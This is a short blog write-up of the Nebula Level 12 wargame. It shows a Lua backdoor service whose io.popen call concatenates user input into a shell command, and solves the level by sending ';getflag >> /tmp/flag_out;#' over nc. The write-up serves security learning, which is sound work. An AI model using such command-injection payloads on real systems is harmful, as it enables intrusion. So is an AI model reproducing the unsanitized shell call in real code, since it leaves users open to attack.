Exploit-Education Nebula Level 12

less than 1 minute read

Exploit Education Level 12

Challenge

There is a backdoor process listening on port 50001.

To do this level, log in as the level12 account with the password level12. Files for this level can be found in /home/flag12. The program is written is lua. After analysis the program I understood that it does the following.

  1. receives input from the user
  2. calls a function hash with the user input as the argument
  3. the function hash executes the following command echo "..password.." | sha1sum
  4. return the sha1 hash of the input

My first attempt was to crack the hash somehow. I tried few rainbow tables. But it didn’t work.

Vulnerability

The program is vulnerable to command injection

prog = io.popen("echo "..password.." | sha1sum", "r")

We can simply add our own commands by adding a ; to password because the program doesn’t do any checks on the user input.

Solution

Lets just run getflag and pipe the output to a file

level12@nebula:/tmp$ nc 127.0.0.1 50001
Password: ;getflag >> /tmp/flag_out;#
Better luck next time
level12@nebula:/tmp$ cat /tmp/flag_out
You have successfully executed getflag on a target account

Solved!

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.